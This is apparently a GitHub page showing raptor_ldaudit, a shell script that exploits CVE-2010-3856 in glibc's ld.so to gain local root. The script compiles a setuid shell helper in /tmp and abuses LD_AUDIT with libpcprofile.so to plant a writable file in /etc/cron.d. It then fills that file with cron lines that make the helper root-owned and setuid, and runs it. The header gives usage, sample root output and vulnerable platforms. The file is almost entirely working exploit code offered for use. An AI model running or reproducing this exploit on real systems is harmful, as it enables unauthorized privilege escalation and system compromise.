-
Notifications
You must be signed in to change notification settings - Fork 115
/
raptor_ldaudit
79 lines (73 loc) · 2.62 KB
/
raptor_ldaudit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
#!/bin/sh
#
# $Id: raptor_ldaudit,v 1.2 2011/02/04 11:04:36 raptor Exp $
#
# raptor_ldaudit - privilege escalation through glibc ld.so
# Copyright (c) 2010 Marco Ivaldi <[email protected]>
#
# Property of @ Mediaservice.net Srl Data Security Division
# http://www.mediaservice.net/ http://lab.mediaservice.net/
#
# ld.so in the GNU C Library (aka glibc or libc6) before 2.11.3, and 2.12.x
# before 2.12.2, does not properly restrict use of the LD_AUDIT environment
# variable to reference dynamic shared objects (DSOs) as audit objects, which
# allows local users to gain privileges by leveraging an unsafe DSO located in
# a trusted library directory, as demonstrated by libpcprofile.so
# (CVE-2010-3856).
#
# "Suit up. Score chicks. Be awesome." -- Barney Stinson
#
# This vulnerability has been disclosed by Tavis Ormandy (with thanks to Ben
# Hawkes and Julien Tinnes): http://seclists.org/fulldisclosure/2010/Oct/344
#
# Other possible attack vectors: /etc/cron.{hourly,daily,weekly,monthly}, at
# (/var/spool/atjobs/), xinetd (/etc/xinetd.d), /etc/logrotate.d and more...
#
# Usage:
# $ chmod +x raptor_ldaudit
# $ ./raptor_ldaudit
# [...]
# Everything looks fine. Just wait for it... LEGEN-DARY!
# -rwsr-xr-x 1 root users 5707 2010-11-11 14:48 /tmp/pwned
# sh-4.1# id
# uid=0(root) gid=0(root) groups=0(root),100(users)
# sh-4.1#
# [don't forget to delete /tmp/pwned*!]
#
# Vulnerable platforms:
# Slackware 13.1 [tested, weird loop in dillon's cron but it works]
# openSUSE 11.3 [untested]
# Fedora Core 13 [untested]
# RHEL/CentOS 5 [untested]
# Ubuntu 10 [untested]
# [...]
#
echo "raptor_ldaudit - privilege escalation through glibc ld.so"
echo "Copyright (c) 2010 Marco Ivaldi <[email protected]>"
echo
# prepare setuid shell helper to circumvent bash checks
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc -o /tmp/pwned /tmp/pwned.c
if [ $? -ne 0 ]; then
echo "Error: Problems compiling setuid shell helper, check your gcc."
exit 1
fi
# do the magic!
runme="/etc/cron.d/runme"
umask 0
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$runme" ping 2>/dev/null
if [ "`cat $runme 2>/dev/null`" = "" ]; then
echo "Error: Not vulnerable or wrong attack vector? See comments."
exit 1
fi
# build the cron script (vixie's crontab)
echo -n > $runme
echo "* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f $runme" >> $runme
# build the cron script (dillon's crontab)
echo "* * * * * chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f $runme" >> $runme
# legen -- wait for it -- dary!
echo -n "Everything looks fine. Just wait for it... "
sleep 70
echo "LEGEN-DARY!"
ls -l /tmp/pwned
/tmp/pwned